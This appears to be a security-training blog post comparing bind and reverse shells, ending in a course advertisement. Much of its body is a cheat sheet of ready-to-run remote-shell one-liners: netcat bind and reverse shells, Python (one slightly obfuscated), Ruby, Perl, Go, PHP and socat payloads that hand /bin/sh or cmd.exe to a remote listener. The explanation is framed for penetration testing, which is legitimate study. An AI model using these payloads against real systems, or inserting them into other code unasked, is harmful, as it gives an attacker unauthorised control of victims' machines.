top of page

Reverse Shell vs Bind Shell

Updated: Apr 11

Popping Shells: When servers become puppets!

Introduction


In a remote attack scenario, the attacker takes control of the victim's machine using the reverse or bind shell technique. This cybersecurity blog post will explore reverse and bind shells in-depth, including illustrative examples. We will clarify what constitutes a reverse and bind shell and highlight their differences. Additionally, we will examine how attackers employ these shells to launch an attack and how to generate them using available tools.


Bind Shells


An attacker triggers a bind shell on a target machine to launch a command shell that listens on a local port. The attacker then connects to the target machine on the listening port and executes commands to take control of the machine.


Bind shell description
Bind shell

Attack Scenario


The attacker delivers a malicious payload to the target machine after exploiting a vulnerability such as a file upload bypass, command injection, etc. When the payload is executed, a port will be opened on the target machine, and then an attacker will connect to the open port and take control of the target machine.


Issues with Bind Shell


  • Anyone can connect to the open bind shell, and an external attacker can take advantage of this scenario and take control of the target machine.

  • Firewalls have strict rules for inbound traffic filtering and prevent attackers from connecting to an open port on the target machine.

  • NAT/PAT translation can change the private IP address (RFC 1918) into different public IP addresses.


Bind Shell using Netcat

Netcat is a command-line interface (CLI) tool used to read/write data over TCP and UDP.

Download Netcat from here.

On Target's Machine
#Windows
 nc -lnvp 3333 -e cmd.exe
 
#Linux
 nc -lnvp 3333 -e /bin/sh
On Attacker's Machine
nc -nv 192.168.226.131 3333
netcat based bind shell

Python Bind Shell

Use the below code to launch python bind shells on the target machine.

#Ipv4   
python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((“<ip>",<port>));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

#Ipv6 
python3 -c 'import socket,os,subprocess;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.bind(("<ip>",<port>,0,2));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

Reverse Shells


A reverse shell actively pushes a connection back to the attacker rather than waiting for the incoming connection. In this case, an attacker will open a local port and listen for a connection from the target machine.


Reverse Shell description
Reverse Shell

Attack Scenario


The attacker delivers a malicious payload to the target machine after exploiting a vulnerability such as a file upload bypass, command injection, etc. When the payload is executed, the target will connect to the attacker on mentioned IP address & port. Then, the attacker will take control of the target machine.


Advantages of Reverse Shell


  • Reverse shells remove the need for a listener on a target machine; thus, the target machine is not vulnerable to other external attackers.

  • Reverse shells can use popular ports (e.g:80,443), usually allowed on egress connections from an internal to an external network, bypassing firewall restrictions.

  • We don't need to specify the remote host's IP address and therefore don't have to face NAT/PAT translation.


Reverse Shell using Netcat

Netcat can be used to create a listener for incoming reverse shells.


On Target Machine

#Windows
 nc -nv 192.168.226.131 7878 -e cmd.exe
 #Linux
 nc -nv 192.168.226.131 7878 -e /bin/sh

On Attacker Machine

nc -lnvp 7878
reverse shell using netcat

Python Reverse Shell


Use the below code to launch python reverse shells on the target machine.


export RHOST="<IP>";export RPORT=<PORT>;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Reverse shell using Python
Reverse shell using Python

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

python3  -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("IP",<PORT>));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'

Ruby Reverse Shell

Use the below code to launch ruby reverse shells on the target machine.

ruby -rsocket -e'exit if fork;c=TCPSocket.new("<IP>","<PORT>");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'

Reverse shell using Ruby
Reverse shell using Ruby

ruby -rsocket -e'f=TCPSocket.open("<IP>",<PORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

Perl Reverse Shell

Use the below code to launch Perl reverse shells on the target machine.

perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Reverse shell using Perl
Reverse shell using Perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;\

Go Reverse Shell

Use the below code to launch Go reverse shells on the target machine.

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<IP>:<PORT>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Reverse shell using Go
Reverse shell using Go

PHP Reverse Shell


Use the below code to launch PHP reverse shells on the target machine.


php -r '$sock=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'

Reverse shell using PHP
Reverse shell using PHP

php -r '$sock=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Reverse Shell using Socat

Socat can be used to create a listener for incoming reverse shells.


On Target Machine

socat tcp-connect:192.168.0.5:4444 system:/bin/sh
On Attacker Machine

socat -d -d TCP4-LISTEN:443 STDOUT

Reverse shell using Socat
Reverse shell using Socat

Tool to Generate Reverse Shells

Reverse Shell generator UI
Reverse Shell generator UI


References


 

Register for instructor-led online courses today!


Check out our free programs!


Reach out to us with your custom pen testing needs at: info@darkrelay.com or WhatsApp us

2,215 views

Recent Posts

See All

Comentarios


bottom of page